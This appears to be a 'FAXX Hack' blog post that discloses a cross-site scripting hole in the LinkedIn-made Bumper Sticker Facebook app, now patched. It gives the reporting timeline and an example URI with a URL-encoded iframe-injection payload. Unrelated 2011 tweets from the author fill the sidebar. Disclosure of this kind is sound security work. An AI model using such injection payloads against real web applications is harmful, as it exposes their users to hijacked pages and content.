FAXX Hack: Bumper Sticker

Double hacks tomorrow to make up for Monday’s break.

Facebook Verified Application

Current Monthly Active Users: 5,422,286

Current Rank on Application Leaderboard: 29

Application Developer: LinkedIn

Responsiveness: I sent this hole to Facebook on Sep. 1, then followed up with an e-mail to LinkedIn over the weekend.

Vulnerability Status: Unpatched Patched Sep. 24

Capable of Clickjacking Install: No

Example URI: http://apps.new.facebook.com/bumpersticker/stickers/show/60441592?confirm_add=1&explanation=%3Cfb%3Aiframe+src%3D%22http%3A%2F%2F11piecesofflare.com%2Fstickers%2Fshow%2F60441592%3Fconfirm_add%3D1%26explanation%3D%253Ciframe%2Bsrc%253D%2522http%253A%252F%252Ffbl.li%252Fr%252F%2522%253E%22%3E

Did @0x6D6172696F just tweet about a coming #deathofXSS? #signsoftheinfosecapocalypse
04:04:05 PM October 25, 2011 from web
Wait, what? RT @Slate Advertisers to tailor online ads by using your webcam to see if you like them http://t.co/GTP9BPUS via @FutureTenseNow
02:59:36 AM October 25, 2011 from web
#FF magazine edition: @Slate @TheAtlantic @newscientist #Slate250K
10:03:51 PM October 21, 2011 from web
Reason #407 why I love @NPR: The bumper music after ATC's segment on fairy tales and Hollywood was from Humperdinck's "Hansel and Gretel".
09:23:49 PM October 20, 2011 from web
Wait, my Kindle app is not signed in either... getting confused about what iCloud backed up... but need sleep, so I'll deal later.
06:16:47 AM October 20, 2011 from Mobile Web

FAXX Hack: Bumper Sticker

Leave a Reply

Further Updates from Twitter

Search Archives

Facebook Page

Content License

Post Archives